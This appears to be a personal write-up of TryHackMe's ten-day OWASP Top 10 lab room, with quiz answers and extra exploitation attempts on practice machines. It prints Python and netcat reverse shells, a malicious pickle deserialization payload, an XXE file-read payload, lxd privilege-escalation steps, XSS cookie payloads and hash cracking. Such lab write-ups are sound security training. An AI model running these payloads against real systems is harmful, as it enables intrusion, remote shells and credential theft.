Learn one of the OWASP vulnerabilities every day for 10 days in a row. A new task will be revealed every day, where each task will be independent of the previous one. These challenges will cover each OWASP topic:
- Day 1) Injection
- Day 2) Broken Authentication
- Day 3) Sensitive Data Exposure
- Day 4) XML External Entity
- Day 5) Broken Access Control
- Day 6) Security Misconfiguration
- Day 7) Cross-site Scripting
- Day 8) Insecure Deserialization
- Day 9) Components with Known Vulnerabilities
- Day 10) Insufficient Logging & Monitoring
The challenges are designed for beginners and assume no previous knowledge of security. On every challenge, I will try to play around with the machine so I will name it as BONUS TIME
DAY 1️⃣: Injection
We need to go to http://<IP>/evilshell.php
[What strange text file is in the website root directory?]
(ls)
* drpepper.txt[How many non-root/non-service/non-daemon users are there?]
(cat /etc/passwd)
* 0[What user is this app running as?]
(whoami)
* www-data[What is the user's shell set as?]
(cat /etc/passwd)
* /usr/sbin/nologin[What version of Ubuntu is running?]
(lsb_release -a)
* 18.04.4[Print out the MOTD. What favorite beverage is shown?]
(cat /etc/update-motd.d/00-header)
* Dr Pepper
BONUS TIME (DAY 1)
Since we can do command injection lets get a reverse shell!
/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
But I can't seem to found anything interesting T_T
DAY 2️⃣: Broken Authentication
Let's check the website on port 8888.
From what we learn let’s try register darren account with space.
Username: darren
Password:anything
So when we login with the new credentials. We got the first flag!
Let’s use the same trick on Arthur and we will get the second flag!
BONUS TIME (DAY 2)
Let's try nmap on this machine
22/tcp open ssh
5000/tcp open http
7777/tcp open http
8888/tcp open http
Port 5000
I can't find anything that is working but you can try to take a look.
Port 7777
As soon I create a new user there is something that captures my eyes.There is a private space for a new user.
The private space looks like this.
Then I try to play with the URL and found the admin password? But not found anything after that.
DAY 3️⃣: Sensitive Data Exposure
Let's use dirsearch to check any interesting files.
When we open assets we found this file.
Let’s use sqlite3 to open the db file.
Let's crack the admin password using hashcat.
hashcat -m 0 hash <wordllist>
Once we got the password we can try to login. We got the flag! :)
[What is the name of the mentioned directory?]
* /assets[Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?]
* webapp.db
BONUS TIME (DAY 3)
Nothing interesting that can be found haha
DAY 4️⃣: XML External Entity
[Full form of XML]
* Extensible Markup Language[Is it compulsory to have XML prolog in XML documents?]
* No[Can we validate XML documents against a schema?]
* Yes[How can we specify XML version and encoding in XML document?]
* XML prolog[How do you define a new ELEMENT?]
* !ELEMENT[How do you define a ROOT element?]
* !DOCTYPE[How do you define a new ENTITY?]
* !ENTITY
The challenge site looks like this.
Let's try to display our name.
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example "Is Here"> ]>
<userInfo>
<firstName>H0j3n</firstName>
<lastName>&example;</lastName>
</userInfo>
For the payloads, we can take a look at [1] which from PayloadAllTheThings ❤. I take this payload which can read /etc/passwd.
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>
We can try to play which files we can read.
[What is the name of the user in /etc/passwd]
* falcon[Where is falcon's SSH key located?]
* /home/falcon/.ssh/id_rsa
BONUS TIME (DAY 4)
Let’s nmap first to see which port is open.
22/tcp open ssh
80/tcp open http
Since we got the id_rsa of falcon lets try to use ssh with that one.
Okay, we manage to get in :) Inside falcon directory we found user.txt? I try to get root and the only way I manage was using group lxd haha. Just follow the steps below.
#Attacker Machine
* git clone https://github.com/saghul/lxd-alpine-builder.git
* cd lxd-alpine-builder
* ./build-alpine=> Then get the file#Victim Machine
* lxc image import ./alpine-v3.12-x86_64-20200717_2325.tar.gz -- alias myimage
* lxc image list
* lxc init myimage ignite -c security.privileged=true
* lxc config device add ignite mydevice disk source=/
* path=/mnt/root recursive=true
* lxc start ignite
* lxc exec ignite /bin/sh=> cd /mnt/root/
DAY 5️⃣: Broken Access Control (IDOR)
We got the credentials to login on the website.
When we got inside the login take a look at the URL there is a parameter that can manipulate.
Since it is a number for the default value which is 1. Let’s use Burpsuite and use Intruder with payloads of numbers.
We got a hit on 0! We got the flag for Day 5 :)
BONUS TIME (DAY 5)
Let’s nmap first to see which port is open.
22/tcp open ssh
80/tcp open http
81/tcp open http
82/tcp open http
Let's use Dirsearch and take a look if we can find any information inside.
Port 80
admin.txt is the flag that we got and I can’t use LFI inside here.
Port 81
So we got index.php only let’s try to open it.
I have tried and when we click submit we will go inside here.
Port 82
So this time we got a flag.txt? And I have tried to play with that api.php but nothing works.
DAY 6️⃣: Security Misconfiguration
We are given a VM with a web application. This VM will focus on default passwords.
Then let’s try to use dirsearch to look for more information.
It seems like nothing to be found haha. So by looking at hint we found out that we need to look at the documentation of the source code. So let's try to check on GitHub!
#Search This
Pensive Notes
A note taking app for people who like to think about their notes
Nice! Then we can find the credentials at the bottom of the README.md.
Alright lets login back using these credentials. We got the flag! :)
BONUS TIME (DAY 6)
Nothing to be found
DAY 7️⃣: Cross-site Scripting
We need to go to the reflected page and start our first challenge.
#1 Reflected XSS
We can see a lot payload for XSS in [1]. A simple one that we should know is like this.
<script>alert("Hello")</script>
Then the next challenge is to pop out with our machine IP address.
<script>alert(window.location.host)</script>
#2 Stored XSS
For this challenge, we need to go to stored page.
First, we need to register our account and then go to Stored XSS again for the next challenge.
We can try to add any HTML but here is mine.
<html>
<body>
<h1>Button H0j3n</h1>
<button type="button" onclick="alert('Hello world!')">Click Me</button>
</body>
</html>
For the next challenge, we need to pop out with our document cookies.
<script>alert(document.cookie)</script>
#3 DOM-Based XSS
For the next challenge, we need to change the XSS Playground as I am a hacker. So first we need to inspect element the XSS Playground.
We can take a look at the hint but make sure we understand how it works too :)
<script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>
BONUS TIME (DAY 7)
Nothing to be found
DAY 8️⃣: Insecure Deserialization
“Insecure Deserialization is a vulnerability which occurs when untrusted data is used to abuse the logic of an application” (Acunetix., 2017)
By looking at Wikipedia we can get the answer for the developer.
[Who developed the Tomcat application?]
* The Apache Software Foundation[What type of attack that crashes services can be performed with insecure deserialization?]
* Denial of Services
# Objects
A prominent element of object-oriented programming (OOP), objects are made up of two things which are State and Behaviour.
[if a dog was sleeping, would this be:]
* A Behaviour
# Deserialization
Insecure deserialization occurs when data from an untrusted party (I.e. a hacker) gets executed because there is no filtering or input validation; the system assumes that the data is trustworthy and will execute it no holds barred. (Credits TryHackMe)
[What is the name of the base-2 formatting that data is sent across a network as?]
* binary
# Cookies
Cookies can be set in various website programming languages. For example, Javascript, PHP or Python to name a few.
[If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be?]
* webappp.com/login[What is the acronym for the web technology that Secure cookies work over?]
* https
For the practical times, we need to navigate to the web application.
Okay first let us sign up with our account.
Here we can see our profile page.
So let's inspect the element and go to Storage and decode the Cookie to get the first flag.
To get the second flag we need to change the user type as admin and go to the admin page.
The next one is much more interesting.
A much more nefarious attack then simply decoding cookies, we get into the nitty-gritty.
Make sure to change the usertype to the user and navigate to the feedback page. Please read the explanation on how it works in TryHackMe :)
import pickle
import sys
import base64 command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR_TRYHACKME_VPN_IP 4444 > /tmp/f' class rce(object):
def __reduce__(self):
import os
return (os.system,(command,)) print(base64.b64encode(pickle.dumps(rce())))
By replacing the IP we can run the script and copy the output. Then paste it inside the cookie while listening. Make sure to refresh to make it works
New things to learn and like always I will update to my notes :) So let's get our flag!
BONUS TIME (DAY 8)
Try to get root using lxd and not found anything haha. The struggle is real xD
DAY 9️⃣: Components With Known Vulnerabilities
Exploit Database or also known as ExploitDB is a website that people use to search for vulnerability or exploit certain software or certain versions. Let’s do this challenge!
First, we need to know what application this website use. So let's use dirsearch.
So we found a few directories and files. The database seems interesting for us to get more information.
Okay! we found readme.txt, let’s open it.
Okay, this would help us search for this application.
Nice! Okay since we know it is PHP-BookStore, let’s search for the exploit in ExploitDB.
Okay since it is available in exploit-db. I will show how usually I use searchsploit to search for exploit.
#To Search
searchsploit book store
Since that's the only one with a python script, let’s download and use it.
#To download
searchsploit -x php/webapps/47887.py >exploit.py
Make sure to comment on the top of the file like this.
Okay, now we can run the exploit :)
Deny the error and just copy the URL given and let's get a reverse shell :)
#Python3 Reverse Shell/usr/bin/python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
So let’s check how many characters in /etc/passwd and submit it!
wc -c /etc/passwd
BONUS TIME (DAY 9)
Let’s enumerate more if we can get until root. Since we know that there is one user name test. I just curious and use test as password and yeah we got the test user xD
Let’s sudo -l
Alright, this one we can get to root easily!
sudo bash
But again there is nothing interesting to be found :’)
DAY 🔟: Insufficient Logging and Monitoring
So we are given a text file which consists of logging with sensitive information.
If we take a look that the same IP is used to log in. It keeps going for 15 minutes until it gets to root. It took the hackers around 15 minutes to Bruteforce the login till rooted.
[What IP address is the attacker using?]
* 49.99.13.16[What kind of attack is being carried out?]
* brute force
Thank you for this room and learn a lot from Day 1 until Day 10!
If there is any suggestion please tell me or if there is something that I can improve also please do tell me. Hope this writeup help anyone and let’s learn together :)